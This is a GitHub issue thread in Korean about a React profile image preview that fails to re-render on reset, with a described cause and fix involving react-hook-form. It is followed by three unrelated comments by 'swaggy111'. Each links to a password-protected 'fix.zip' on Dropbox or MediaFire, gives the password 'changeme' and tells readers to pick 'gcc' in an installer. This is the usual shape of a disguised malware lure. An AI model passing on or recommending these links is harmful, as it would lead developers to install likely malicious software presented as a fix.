### ISSUE TITLE
[ISSUE] 프로필 이미지 초기화시 미리보기 적용이 되지않는점

### ISSUE THREAD

**Issue by j2h30728** [j2h30728/cheer-dam#16]
## 주제

프로필 이미지 초기화시 미리보기 적용이 되지않는점
#### 원인
- 이전에는 preview image url에 초기화 값(수정전의 사용자의 이미지 정보)을 주지 않았다. 그렇기 때문에 preview image url 을 빈값으로 초기화시켜도 값이 연결되어 있지않기 때문에 리렌더링 촉발이 되지않았다.
- 또한 react-hook-form에서의 getValues는 리렌더링을 일으키지않고 값을 읽어온다.

#### 해결
- upload image 훅에 preview image url의 초기화값을 전달하여, preivew image url 기준으로 프로필 이미지를 렌더링하는 것으로 변경한다.

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
